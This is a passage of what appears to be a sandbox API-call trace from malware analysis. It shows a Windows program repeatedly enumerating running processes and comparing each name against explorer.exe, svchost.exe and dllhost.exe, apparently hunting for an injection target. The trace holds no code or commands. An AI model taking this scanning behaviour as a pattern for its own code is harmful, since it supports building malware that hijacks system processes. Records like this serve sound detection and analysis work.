cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0188.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0188.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.774] CloseHandle (hObject=0xec) returned 1 [0188.774] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0188.774] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0188.774] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0188.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0188.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0188.775] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.775] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.775] CloseHandle (hObject=0xec) returned 1 [0188.775] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0188.775] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0188.775] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0188.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0188.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0188.776] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.776] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.776] CloseHandle (hObject=0xec) returned 1 [0188.776] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0188.776] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0188.776] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0188.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0188.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0188.776] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.776] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.777] CloseHandle (hObject=0xec) returned 1 [0188.777] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0188.777] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0188.777] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0188.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0188.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0188.777] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.777] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.777] CloseHandle (hObject=0xec) returned 1 [0188.777] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0188.777] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0188.777] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0188.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0188.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0188.778] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.778] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.778] CloseHandle (hObject=0xec) returned 1 [0188.778] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0188.778] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0188.778] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0188.778] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0188.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0188.779] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.779] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.779] CloseHandle (hObject=0xec) returned 1 [0188.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0188.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0188.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0188.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0188.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0188.779] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.779] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.779] CloseHandle (hObject=0xec) returned 1 [0188.779] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0188.779] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0188.779] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0188.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0188.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0188.780] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.780] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.780] CloseHandle (hObject=0xec) returned 1 [0188.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0188.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0188.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0188.780] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0188.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0188.781] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.781] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.781] CloseHandle (hObject=0xec) returned 1 [0188.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0188.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0188.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0188.781] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0188.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0188.781] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.781] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.781] CloseHandle (hObject=0xec) returned 1 [0188.781] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0188.781] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0188.781] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0188.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0188.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0188.783] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0188.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0188.783] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0188.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0188.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0188.785] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0188.785] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.785] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.785] CloseHandle (hObject=0xec) returned 1 [0188.785] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0188.786] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.786] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.786] CloseHandle (hObject=0xec) returned 1 [0188.786] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0188.787] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0188.787] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.787] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.787] CloseHandle (hObject=0xec) returned 1 [0188.787] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0188.787] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0188.788] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.788] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.788] CloseHandle (hObject=0xec) returned 1 [0188.788] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.788] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0188.789] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.789] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.789] CloseHandle (hObject=0xec) returned 1 [0188.789] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0188.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0188.789] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.789] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0188.790] CloseHandle (hObject=0xec) returned 1 [0188.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0188.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0188.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0188.790] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0188.790] CloseHandle (hObject=0xe8) returned 1 [0188.790] Sleep (dwMilliseconds=0x3e8) [0189.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0189.866] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0189.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0189.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0189.868] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0189.868] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0189.869] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0189.869] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0189.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0189.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0189.871] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0189.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0189.871] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0189.872] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0189.872] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0189.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0189.873] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0189.874] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0189.874] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0189.875] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0189.875] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0189.876] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.876] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0189.876] CloseHandle (hObject=0xec) returned 1 [0189.876] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 